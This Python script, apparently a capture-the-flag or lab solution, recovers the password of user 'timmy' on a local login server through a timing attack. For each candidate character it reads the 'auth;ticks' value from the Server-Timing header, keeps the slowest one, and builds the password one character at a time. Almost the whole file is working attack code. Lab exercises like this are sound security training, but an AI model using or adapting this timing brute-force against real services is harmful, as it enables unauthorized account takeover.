import requests
import json
import pandas as pd
import os
params = {'Host': '192.168.1.77:5003',
'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/33.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate' ,}



headers ={'Content-Type': 'application/x-www-form-urlencoded'}
url1='http://192.168.1.77:5003/token'
url2='http://192.168.1.77:5003/login'


data1={"token":"23-NJWlBIRKBnF0LasKCpsOAg-23"}

cookie={'hacker_token':'23-NJWlBIRKBnF0LasKCpsOAg-23'}
response1 = requests.post(url=url1,params=params,data=data1,headers=headers)

s= '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ`~!@#$%^&*()-_=+[]\{}|;:",./<>?'

var=""
f=""
print("Validating the checks !!!")
for i in range(20):
    case_list = {}
    for c in s:
        data2={"username":'timmy',"password":var+c}
        try:
                response2 = requests.post(url=url2,params=params,data=data2,headers=headers,cookies=cookie)
        except:
        #       var=var+c
        #       print("BAM!!!! Are you looking for this?    ",var)
                os._exit(0)
#       print(e)
        print(var+c)
        #print(c,response2.headers['Server-Timing'])
        time =response2.headers['Server-Timing']
        val= time.replace("auth;ticks=","")
        case = {c:int(val) }
        case_list.update(case)
    char=(max(case_list, key=case_list.get))
    #print(char)
    var+= str(char)
    print(var)
print('Bam!!! it is ',var)
